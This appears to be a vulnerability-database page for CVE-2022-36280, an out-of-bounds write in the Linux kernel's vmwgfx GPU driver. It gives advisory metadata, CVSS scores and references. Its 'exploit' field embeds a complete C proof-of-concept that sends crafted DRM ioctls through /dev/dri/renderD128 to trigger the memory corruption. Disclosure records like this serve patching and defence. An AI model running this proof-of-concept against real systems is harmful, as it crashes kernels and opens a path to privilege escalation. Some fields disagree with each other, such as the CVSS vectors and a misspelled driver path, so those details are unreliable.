gsd-2022-36280
Vulnerability from gsd
Modified
2023-12-13 01:19
Details
An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
Aliases
Aliases



{
   GSD: {
      alias: "CVE-2022-36280",
      description: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
      id: "GSD-2022-36280",
      references: [
         "https://www.suse.com/security/cve/CVE-2022-36280.html",
         "https://www.debian.org/security/2023/dsa-5324",
         "https://advisories.mageia.org/CVE-2022-36280.html",
         "https://ubuntu.com/security/CVE-2022-36280",
      ],
   },
   gsd: {
      metadata: {
         exploitCode: "unknown",
         remediation: "unknown",
         reportConfidence: "confirmed",
         type: "vulnerability",
      },
      osvSchema: {
         aliases: [
            "CVE-2022-36280",
         ],
         details: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
         id: "GSD-2022-36280",
         modified: "2023-12-13T01:19:21.618953Z",
         schema_version: "1.4.0",
      },
   },
   namespaces: {
      "cve.org": {
         CVE_data_meta: {
            AKA: "Anolis",
            ASSIGNER: "security@openanolis.org",
            DATE_PUBLIC: "2022-09-06T07:00:00.000Z",
            ID: "CVE-2022-36280",
            STATE: "PUBLIC",
            TITLE: "There is an out-of-bounds write vulnerability in vmwgfx driver",
         },
         affects: {
            vendor: {
               vendor_data: [
                  {
                     product: {
                        product_data: [
                           {
                              product_name: "kernel",
                              version: {
                                 version_data: [
                                    {
                                       version_affected: ">=",
                                       version_name: "5.13.0-52",
                                       version_value: "v3.2-rc1",
                                    },
                                 ],
                              },
                           },
                        ],
                     },
                     vendor_name: "Linux",
                  },
               ],
            },
         },
         credit: [
            {
               lang: "eng",
               value: "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab",
            },
         ],
         data_format: "MITRE",
         data_type: "CVE",
         data_version: "4.0",
         description: {
            description_data: [
               {
                  lang: "eng",
                  value: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
               },
            ],
         },
         exploit: [
            {
               lang: "eng",
               value: "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n\n#include <linux/if_tun.h>\n#include <net/if.h>\n#include <sys/ioctl.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <sys/socket.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/ioctl.h>\n#include <errno.h>\n#include <stdio.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdint.h>\n#include <netinet/ip.h>\n#include <sys/resource.h>\n#include <sys/syscall.h>\n#include <limits.h>\n#include <sys/mman.h>\n\n#include <linux/fs.h>\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0x2000;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, &arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, &arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, &arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint handle=alloc_bo();\n  int sid =    create_surface();     \n  printf(\"%d\",sid);     \n    poc(handle,sid);            \n  \n}\n\n\n",
            },
         ],
         generator: {
            engine: "Vulnogram 0.0.9",
         },
         impact: {
            cvss: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 6.3,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "NONE",
               integrityImpact: "LOW",
               privilegesRequired: "LOW",
               scope: "UNCHANGED",
               userInteraction: "REQUIRED",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
               version: "3.1",
            },
         },
         problemtype: {
            problemtype_data: [
               {
                  description: [
                     {
                        lang: "eng",
                        value: "CWE-120 Buffer Overflow",
                     },
                  ],
               },
            ],
         },
         references: {
            reference_data: [
               {
                  name: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
                  refsource: "MISC",
                  url: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
               },
               {
                  name: "DSA-5324",
                  refsource: "DEBIAN",
                  url: "https://www.debian.org/security/2023/dsa-5324",
               },
               {
                  name: "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
                  refsource: "MLIST",
                  url: "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html",
               },
               {
                  name: "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
                  refsource: "MLIST",
                  url: "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html",
               },
            ],
         },
         source: {
            defect: [
               "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
            ],
            discovery: "INTERNAL",
         },
      },
      "nvd.nist.gov": {
         configurations: {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "5.13.0-52",
                        versionStartIncluding: "3.2",
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
         cve: {
            CVE_data_meta: {
               ASSIGNER: "security@openanolis.org",
               ID: "CVE-2022-36280",
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "en",
                     value: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "en",
                           value: "CWE-787",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
                     refsource: "MISC",
                     tags: [
                        "Issue Tracking",
                        "Permissions Required",
                        "Third Party Advisory",
                     ],
                     url: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
                  },
                  {
                     name: "DSA-5324",
                     refsource: "DEBIAN",
                     tags: [
                        "Third Party Advisory",
                     ],
                     url: "https://www.debian.org/security/2023/dsa-5324",
                  },
                  {
                     name: "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
                     refsource: "MLIST",
                     tags: [],
                     url: "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html",
                  },
                  {
                     name: "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
                     refsource: "MLIST",
                     tags: [],
                     url: "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html",
                  },
               ],
            },
         },
         impact: {
            baseMetricV3: {
               cvssV3: {
                  attackComplexity: "LOW",
                  attackVector: "LOCAL",
                  availabilityImpact: "HIGH",
                  baseScore: 5.5,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "NONE",
                  integrityImpact: "NONE",
                  privilegesRequired: "LOW",
                  scope: "UNCHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.1",
               },
               exploitabilityScore: 1.8,
               impactScore: 3.6,
            },
         },
         lastModifiedDate: "2023-05-03T14:15Z",
         publishedDate: "2022-09-09T15:15Z",
      },
   },
}


Log in or create an account to share your comment.

Security Advisory comment format.

This schema specifies the format of a comment related to a security advisory.

UUIDv4 of the comment
UUIDv4 of the Vulnerability-Lookup instance
When the comment was created originally
When the comment was last updated
Title of the comment
Description of the comment
The identifier of the vulnerability (CVE ID, GHSA-ID, PYSEC ID, etc.).



Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.